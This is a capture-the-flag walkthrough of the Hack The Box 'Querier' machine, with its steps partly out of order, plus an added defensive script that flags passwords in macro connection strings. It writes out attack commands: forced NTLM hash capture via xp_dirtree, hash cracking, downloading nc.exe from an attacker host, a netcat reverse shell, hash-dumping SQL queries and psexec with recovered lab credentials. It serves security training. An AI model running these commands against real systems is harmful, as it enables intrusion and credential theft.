Hackthebox - Querier
Windows
Let's try to list the shares
Let's try to connect to Reports. It works
We get an Excel file that contains a macro. With some online research we find this article by Nairuz Abulhul that mentions
We can connect with mssqlclient.py from impacket
Note: I was struggling with the impacket command; it turns out that in order to work, the password needs to be wrapped not in double quotes or no quotes BUT in single quotes (seems to be because of the dollar sign in the password).
python3 /opt/impacket/examples/mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
We get a shell this way
Here is an interesting article from hacktricks for mssql
We do not have enough rights to create a user
I tried this for cmd execution but it is not working.
OK, we do not have many permissions; we should check another way.
We can try something like this on Mark Mo's blog
Let's create a directory on our attacking machine:
mkdir querysmb
Now we just need to run the exec command that makes the server connect to our share and drop the hash:
exec xp_dirtree '\\10.10.14.7\myshare\'
Let's check our permissions with this user:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
We have many more than before.
Seems like we could even try xp_cmdshell again.
We can get the user flag:
EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';
Let's get nc.exe onto our target. First, serve it from the attacking machine:
python3 -m http.server 80
EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.14.7/nc.exe'
We get it.
EXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\'
We check that it worked.
We set a listener:
rlwrap nc -lvp 4444
EXEC master..xp_CMDShell 'C:\Users\mssql-svc\Desktop\nc.exe -e cmd.exe 10.10.14.7 4444'
systeminfo
Let's use wes to see what exploit we could use:
python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"
I will grep a few lines before and after to get the whole CVE info.
I also want to try PowerUp before using any kernel exploit
curl.exe -o C:\Users\mssql-svc\Desktop\powerup.ps1 http://10.10.14.7/PowerUp.ps1
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks | Out-String -Width 4096
We have a cleartext password for the Administrator: MyUnclesAreMarioAndLuigi!!1!
python3 /opt/impacket/examples/psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
We have an admin shell, so we can grab the final flag!
type C:\Users\Administrator\Desktop\root.txt
Using olevba on the file:
olevba Currency\ Volume\ Report.xlsm
we are able to find the password for the SQL server:
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
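As an added example (not part of the original write-up), here is a small Python check a defender could run over olevba output to flag macro connection strings that carry an embedded password, reporting the target and user while masking the secret. The regex, the VBA sample around the connection string, and the field names are constructed for this example.

```python
import re

# Matches a double-quoted ODBC-style connection string ("Key=Value;Key=Value")
# inside VBA source such as olevba prints. Constructed for this example.
CONN_RE = re.compile(r'"((?:[A-Za-z_ ]+=[^;"]*;?)+)"')
SECRET_KEYS = {"pwd", "password"}          # keys whose values are secrets

# Constructed sample: a macro shaped like the one olevba extracted above.
SAMPLE_VBA = '''Sub Connect()
    Dim conn As Object
    Set conn = CreateObject("ADODB.Connection")
    conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
    conn.Open
End Sub
'''

def parse_conn_string(s):
    """Split 'Key=Value;Key=Value' into (key, value) pairs, keeping key case."""
    pairs = []
    for item in s.split(";"):
        if "=" in item:
            k, v = item.split("=", 1)
            pairs.append((k.strip(), v.strip()))
    return pairs

def redact(pairs):
    """Rebuild the connection string with secret values masked."""
    return ";".join(f"{k}=***" if k.lower() in SECRET_KEYS else f"{k}={v}"
                    for k, v in pairs)

def find_embedded_credentials(vba_text):
    """Return one finding per connection string that carries a password."""
    findings = []
    for m in CONN_RE.finditer(vba_text):
        pairs = parse_conn_string(m.group(1))
        lower = {k.lower(): v for k, v in pairs}
        if not (lower.keys() & SECRET_KEYS):
            continue                       # no password embedded, not a finding
        findings.append({
            "line": vba_text.count("\n", 0, m.start()) + 1,
            "server": lower.get("server"),
            "database": lower.get("database"),
            "user": lower.get("uid") or lower.get("user id"),
            "redacted": redact(pairs),
        })
    return findings

if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_VBA):
        print(f"line {f['line']}: {f['user']}@{f['server']}/{f['database']} -> {f['redacted']}")
```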
We can list the tables:
select * from volume.INFORMATION_SCHEMA.TABLES;
We can list users:
select sp.name as login,
       sp.type_desc as login_type,
       sl.password_hash,
       sp.create_date,
       sp.modify_date,
       case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status
from sys.server_principals sp
left join sys.sql_logins sl on sp.principal_id = sl.principal_id
where sp.type not in ('G', 'R')
order by sp.name;
Or, with the password hashes as hex strings:
SELECT CONCAT(sp.name, '***', master.sys.fn_varbintohexstr(sl.password_hash))
FROM master.sys.server_principals sp
LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
We can check the MS SQL version we have:
SELECT @@VERSION AS 'SQL Server Version';
Check if we have other databases:
select name from sys.databases;
Check our user permissions:
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
Let's launch smbserver:
python3 /opt/impacket/examples/smbserver.py -smb2support myshare querysmb
And it works
Now let's copy the hash into a text file and try to crack it using hashcat:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's try to connect to SQL again, but with this user.
Let's try to enable it:
enable_xp_cmdshell
If we issue our previous command again, it works.
We get a shell